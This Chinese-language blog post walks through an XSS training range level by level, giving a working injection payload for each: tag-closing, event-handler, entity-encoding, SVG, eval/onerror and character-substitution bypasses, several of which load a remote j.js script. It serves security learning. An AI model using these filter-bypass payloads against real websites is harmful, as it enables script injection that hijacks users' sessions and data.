XSS中级漏洞(靶场)

目录

一、环境

二、正式开始闯关

0x01

0x02

0x03

0x04

0x05

0x06

0x07

0x08

0x0B

0x0C

0x0D

0x0E

​ 0x0F

0x10

0x11

0x12


一、环境

在线环境(gethub上面的)

alert(1)

二、正式开始闯关

0x01

源码:

思路:闭合标签注入

复制代码
</textarea><script>alert(1)</script>

0x02

源码:

思路:跟上一题一样

复制代码
1" onclick="alert(1)

也可以用户不参与去触发给后面加一个标签就可以了

复制代码
1"><script>alert(1)</script>

0x03

源码:

思路: 有一个正则把括号过滤掉了,用html实体转码

很明显不行,那试一下<a>标签

复制代码
<a href="javascript:alert&#40;1&#41;">aaaaa</a>

很容易过了

原因:编码是有顺序的,urlcode-->html实体编码--->unicode实体编码

第二种方法:括号替换

复制代码
<script>alert`1`</script>

0x04

刚才第三关的第一种做法是照样绕过的

svg标签是照样绕过的

复制代码
<svg><script>alert&#40;1&#41</script></svg>

svg和html是不同的命名空间,在svg中script是可以实现一个实体编码的

还有一种方法Windows.oneror

复制代码
<script>window.onerror=eval;throw'=alert\u00281\u0029'</script>

throw是抛异常的,我们再用eval接到,在throw下可以支持符号编码

0x05

闭合输出

复制代码
--!><script>alert(1)</script>

0x06

利用点:html支持换行

因为on和等号是整体所以加了等号

复制代码
onclick
=alert(1)

还有一种用户不参与的方式

复制代码
type=image src=1 onerror
=alert(1)

0x07

利用html自动纠错

复制代码
<img src=1 onerror="alert(1)"
复制代码
<svg/onload="alert(1)"

0x08

源码:

解法:固定过滤,利用空格

0x09

一个小技巧

复制代码
https://www.segmentfault.com.haozi.me/j.js

很明显

0x0A

跟上一关一样,解析顺序,解析的时候已经被实体编码转译了

0x0B

我们正常操作无法绕过直接进行实体编码,直接也就过了

复制代码
</h1><svg><script>&#x61;&#x6c;&#x65;&#x72;&#x74;(1)</script>

单标签也可以绕过

复制代码
<img src=1 onerror=&#x61;&#x6c;&#x65;&#x72;&#x74;(1)>

0x0C

单标签也可以绕过

复制代码
<img src=1 onerror=&#x61;&#x6c;&#x65;&#x72;&#x74;(1)>

双写也可以绕过

复制代码
<scrscriptipt src="https://www.segmentfault.com.haozi.me/j.js"></scrscriptipt>

0x0D

技巧:写在前面可以注释,写在后面无法注释了

复制代码
alert(1)
-->

0x0E

技巧:字符替换

长s字符:ſ

复制代码
<ſcript src="https://www.segmentfault.com.haozi.me/j.js"></script>

0x0F

原理:先编码再解码

复制代码
');alert('1

0x10

先闭合掉

复制代码
1;alert(1)

0x11

利用替换两个反斜杠

复制代码
");alert("1

0x12

转义符没有被过滤

复制代码
\"); alert(1); //

第二种方法:通过闭合前面script标签来再输入script标签

复制代码
</script> <script>alert(1)</script><script>
相关推荐
DevSecOps选型指南4 小时前
2025软件供应链安全最佳实践︱证券DevSecOps下供应链与开源治理实践
网络·安全·web安全·开源·代码审计·软件供应链安全
ABB自动化4 小时前
for AC500 PLCs 3ADR025003M9903的安全说明
服务器·安全·机器人
coding随想4 小时前
JavaScript ES6 解构:优雅提取数据的艺术
前端·javascript·es6
小小小小宇4 小时前
一个小小的柯里化函数
前端
恰薯条的屑海鸥4 小时前
零基础在实践中学习网络安全-皮卡丘靶场(第十六期-SSRF模块)
数据库·学习·安全·web安全·渗透测试·网络安全学习
灵感__idea4 小时前
JavaScript高级程序设计(第5版):无处不在的集合
前端·javascript·程序员
小小小小宇4 小时前
前端双Token机制无感刷新
前端
小小小小宇4 小时前
重提React闭包陷阱
前端
小小小小宇5 小时前
前端XSS和CSRF以及CSP
前端
UFIT5 小时前
NoSQL之redis哨兵
java·前端·算法